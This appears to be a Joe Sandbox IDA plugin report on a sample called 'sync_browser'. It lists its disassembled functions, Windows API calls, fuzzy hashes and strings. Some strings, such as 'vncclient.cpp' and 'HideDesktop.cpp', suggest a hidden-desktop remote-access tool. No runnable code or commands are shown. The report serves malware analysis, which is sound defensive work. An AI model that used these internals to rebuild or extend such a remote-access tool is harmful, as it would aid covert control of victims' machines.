Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
Instruction ID: 72db0b7ec7d04cc2bbf8c897c7006036df9f5bdfe5ffa4e0ebd5b36ecbe544fe
Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
Instruction Fuzzy Hash: E3015E25A0964287FA48BFB9A44447CA6A1AF88F94BC84236CD2E073D5DF3CE445C630

Function 00007FF7D59E99D8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59E99ED
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E99F8
_flush.LIBCMT ref: 00007FF7D59E9A07
_freebuf.LIBCMT ref: 00007FF7D59E9A11
_fileno.LIBCMT ref: 00007FF7D59E9A19

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
String ID:
API String ID: 3613856401-0
Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
Instruction ID: 1a9133eb46e94f904169fd4e1d190e3853ab1c8368c2a58169f9ca144499c78c
Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
Instruction Fuzzy Hash: B5016D22E1E64243FE55BA75984237C91509F95F6CFE90636EE6D461C3CF7CE84183A0

Function 00007FF7D594DEB0 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF7D594DECD
free.LIBCMT ref: 00007FF7D594DED7

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

DeleteObject.GDI32 ref: 00007FF7D594DEE0
free.LIBCMT ref: 00007FF7D594DEEA
DeleteObject.GDI32 ref: 00007FF7D594DEF3
free.LIBCMT ref: 00007FF7D594DEFD

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
Instruction ID: 294934a17120583a0dd30931f2ff85bc9623ef1b45894e80a92128c2f8d07346
Opcode Fuzzy Hash: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
Instruction Fuzzy Hash: 4101FF22A19A4197DA54EB66EA5047CA324FFC8F84BC44032DE5D47B65CF38E866C320

Function 00007FF7D5940310 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF7D594032D
free.LIBCMT ref: 00007FF7D5940337

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

DeleteObject.GDI32 ref: 00007FF7D5940340
free.LIBCMT ref: 00007FF7D594034A
DeleteObject.GDI32 ref: 00007FF7D5940353
free.LIBCMT ref: 00007FF7D594035D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
Instruction ID: 22745c34d6add9f62d11bb30a3d00d17f712a2d81145ea9669a1f39739dec771
Opcode Fuzzy Hash: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
Instruction Fuzzy Hash: 1901FF22A19A4197DA54EB66EA5047CA724FFC8F84BC44033DE5D47761CF38E8A6C320

Function 00007FF7D594DD20 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF7D594DD37
free.LIBCMT ref: 00007FF7D594DD41

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

DeleteObject.GDI32 ref: 00007FF7D594DD4A
free.LIBCMT ref: 00007FF7D594DD54
DeleteObject.GDI32 ref: 00007FF7D594DD5D
free.LIBCMT ref: 00007FF7D594DD67

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction ID: 0ae69d9bfe968b89778a0310ef836fe2e2454d6d9e17a7e43944d6ca54e9c66a
Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction Fuzzy Hash: E2F0B262A69A5187EB54EF75E85147CA728FFC8F88BC44032CE1E57265CF38D896C320

Function 00007FF7D595B810 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D595B866
ReadFile.KERNEL32 ref: 00007FF7D595B8B8
LeaveCriticalSection.KERNEL32 ref: 00007FF7D595BB99
LeaveCriticalSection.KERNEL32 ref: 00007FF7D595BBB1

Strings

vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF7D595BA26

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterFileRead
String ID: vncclient.cpp : Compress returned error in File Send :%d
API String ID: 3826087893-1161645139
Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
Instruction ID: d0c137b45ea4379a74581659b4177d17925cfe9ced1aab31dcf20509f67b5861
Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
Instruction Fuzzy Hash: 41B1BF72A08A428AE7549F25C8403BD77A2EB94F9CFC84136DE5E4B6C9CF78E411C764

Function 00007FF7D5987530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5987574
GetProcAddress.KERNEL32 ref: 00007FF7D5987591
FreeLibrary.KERNEL32 ref: 00007FF7D5987619

Strings

USER32, xrefs: 00007FF7D598756D
EnumDisplayDevicesA, xrefs: 00007FF7D5987587

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction ID: 829f8a046da73eef68998167f7618d02ec244b7cd4db2cdb27cb0beb32924b56
Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction Fuzzy Hash: 5D31B532609B8287EA64EB15F4546ADA6A0FF89B98FD40136EE9D03794DF3DD805C720

Function 00007FF7D59872F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5987335
GetProcAddress.KERNEL32 ref: 00007FF7D5987352
FreeLibrary.KERNEL32 ref: 00007FF7D59873D9

Strings

USER32, xrefs: 00007FF7D598732E
EnumDisplayDevicesA, xrefs: 00007FF7D5987348

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
Instruction ID: 133fb5bdcc7fe4e67a848933df7d224604b38fa660748001d707ea42426c1ef9
Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
Instruction Fuzzy Hash: 02317232608B8686E665EB15B4546ADABA0FF89F98FD40236EE9D03794DF3DD4018720

Function 00007FF7D59871D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5987212
GetProcAddress.KERNEL32 ref: 00007FF7D598722F
FreeLibrary.KERNEL32 ref: 00007FF7D598729D

Strings

USER32, xrefs: 00007FF7D598720B
EnumDisplayDevicesA, xrefs: 00007FF7D5987225

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction ID: c77bcbe3e772a33e8faedcce093eaa3e05769f9d3cdda54ce41cc18fc6c84c88
Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction Fuzzy Hash: 20218472B18B8247E764EF15E440A6DA7A4FB89B94FC50136ED5D43784DF3DD4018750

Function 00007FF7D59367E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7D5936851
RegQueryValueExA.ADVAPI32 ref: 00007FF7D5936889
RegCloseKey.ADVAPI32 ref: 00007FF7D59368BB

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF7D5936838
SubVersionNumber, xrefs: 00007FF7D5936865

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
API String ID: 3677997916-1834015684
Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
Instruction ID: 356b1e9daaf70f2a84b1f8a1e2595491814a30e751a5fb52ba44fb33968c2a2c
Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
Instruction Fuzzy Hash: 7B213561A18A8282FB609B24E4447AEF7A4FF98B58FC41136DE4D07698EF3CD055CB14

Function 00007FF7D593A600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D593A661

Part of subcall function 00007FF7D593A200: GetProcAddress.KERNEL32 ref: 00007FF7D593A225
Part of subcall function 00007FF7D593A200: FreeLibrary.KERNEL32 ref: 00007FF7D593A265

Part of subcall function 00007FF7D593A290: CoInitialize.OLE32 ref: 00007FF7D593A2B8
Part of subcall function 00007FF7D593A290: CoCreateInstance.OLE32 ref: 00007FF7D593A2E5

SystemParametersInfoA.USER32 ref: 00007FF7D593A694

Strings

shell32.dll, xrefs: 00007FF7D593A65A
HideDesktop.cpp : Restorewallpaper %i %i, xrefs: 00007FF7D593A635
HideDesktop.cpp : Restorewallpaper %i, xrefs: 00007FF7D593A60B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
API String ID: 3848869850-2975526927
Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction ID: 0715862af1dc6435ca645c3c77f199136e36d45ce8ce7623e2f95c65a0acd122
Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction Fuzzy Hash: AC11F864E1915383FB18BB64E814ABDAF51AF90B48FC04437CC0E576A1DF3CA605C7A1

Function 00007FF7D5936D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7D5936D93
RegQueryValueExA.ADVAPI32 ref: 00007FF7D5936DD1
RegCloseKey.ADVAPI32 ref: 00007FF7D5936DF0

Strings

System\WPA\MediaCenter, xrefs: 00007FF7D5936D6E
Installed, xrefs: 00007FF7D5936DBA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Installed$System\WPA\MediaCenter
API String ID: 3677997916-3461404619
Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction ID: d7189e7d0db5bec80c18eb67dafb6e72605bb9c7c38c46ef2399dce1ab0c5936
Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction Fuzzy Hash: 39013071628B9187EB509B25F444B5AB7A4FB84B88FC00132EA9D46A58DF3CD154CB10

Function 00007FF7D593D790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00007FF7D593D7BA
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593D7D6
WritePrivateProfileSectionA.KERNEL32 ref: 00007FF7D593D804

Strings

isWritable, xrefs: 00007FF7D593D7C5
Permissions, xrefs: 00007FF7D593D7CC, 00007FF7D593D7FA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
